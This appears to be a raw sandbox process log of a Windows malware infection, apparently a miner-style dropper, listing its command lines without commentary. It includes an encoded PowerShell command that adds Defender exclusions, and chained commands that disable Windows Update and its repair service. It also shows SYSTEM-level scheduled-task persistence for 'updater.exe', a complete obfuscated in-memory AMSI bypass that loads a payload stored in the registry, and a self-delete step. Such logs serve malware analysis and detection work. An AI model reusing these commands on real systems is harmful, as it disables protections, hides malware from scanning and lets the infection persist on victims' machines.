powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:vVkefQIUvQwC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$AAQFOfJxLMpQUK,[Parameter(Position=1)][Type]$iCwjxecoMc)$jOfnizMJkQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$jOfnizMJkQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$AAQFOfJxLMpQUK).SetImplementationFlags('Runtime,Managed');$jOfnizMJkQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$iCwjxecoMc,$AAQFOfJxLMpQUK).SetImplementationFlags('Runtime,Managed');Write-Output $jOfnizMJkQb.CreateType();}$RWdfJfqcSOqwl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XtOHrAsMhQVPCC=$RWdfJfqcSOqwl.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RxQMonzJTZYvuAJuZlf=vVkefQIUvQwC @([String])([IntPtr]);$lIVeqidCFnkSzDFvrGZuwQ=vVkefQIUvQwC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jhOyDvGUFNp=$RWdfJfqcSOqwl.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$GIrXKKDTouyojI=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$jhOyDvGUFNp,[Object]('Load'+'LibraryA')));$KLaxLqgQheshZqDrx=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$jhOyDvGUFNp,[Object]('Vir'+'tual'+'Pro'+'tect')));$ldVmiTg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GIrXKKDTouyojI,$RxQMonzJTZYvuAJuZlf).Invoke('a'+'m'+'si.dll');$atXGZzrVcbonKTxog=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$ldVmiTg,[Object]('Ams'+'iSc'+'an'+'Buffer')));$hZEDmUcvGq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KLaxLqgQheshZqDrx,$lIVeqidCFnkSzDFvrGZuwQ).Invoke($atXGZzrVcbonKTxog,[uint32]8,4,[ref]$hZEDmUcvGq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$atXGZzrVcbonKTxog,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KLaxLqgQheshZqDrx,$lIVeqidCFnkSzDFvrGZuwQ).Invoke($atXGZzrVcbonKTxog,[uint32]8,0x20,[ref]$hZEDmUcvGq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YeocFvTjtgid{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vzvlvLjQKVLmCw,[Parameter(Position=1)][Type]$LgmylDxtgV)$hUjRxOTTbMc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$hUjRxOTTbMc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$vzvlvLjQKVLmCw).SetImplementationFlags('Runtime,Managed');$hUjRxOTTbMc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LgmylDxtgV,$vzvlvLjQKVLmCw).SetImplementationFlags('Runtime,Managed');Write-Output $hUjRxOTTbMc.CreateType();}$zgsSIaYIUXdHV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$ghIXlKeIEmhFWZ=$zgsSIaYIUXdHV.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PFuejJVpaSVwPFaeurN=YeocFvTjtgid @([String])([IntPtr]);$GMAvUbPAXGggWCCVDeoDuq=YeocFvTjtgid @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HVecakmUUWL=$zgsSIaYIUXdHV.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$kizSwqqfCWLZrt=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$HVecakmUUWL,[Object]('Load'+'LibraryA')));$QRZIjIYJmupCrAEym=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$HVecakmUUWL,[Object]('Vir'+'tual'+'Pro'+'tect')));$VSOiJlE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kizSwqqfCWLZrt,$PFuejJVpaSVwPFaeurN).Invoke('a'+'m'+'si.dll');$hAQzEHSkdjoheqKbZ=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$VSOiJlE,[Object]('Ams'+'iSc'+'an'+'Buffer')));$wBHwWyrcrB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QRZIjIYJmupCrAEym,$GMAvUbPAXGggWCCVDeoDuq).Invoke($hAQzEHSkdjoheqKbZ,[uint32]8,4,[ref]$wBHwWyrcrB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hAQzEHSkdjoheqKbZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QRZIjIYJmupCrAEym,$GMAvUbPAXGggWCCVDeoDuq).Invoke($hAQzEHSkdjoheqKbZ,[uint32]8,0x20,[ref]$wBHwWyrcrB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5ea441e2-6fb5-4e6a-9501-c34b8879db7e}

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Chrome\updater.exe

C:\Users\Admin\Chrome\updater.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\Chrome\updater.exe

C:\Users\Admin\Chrome\updater.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

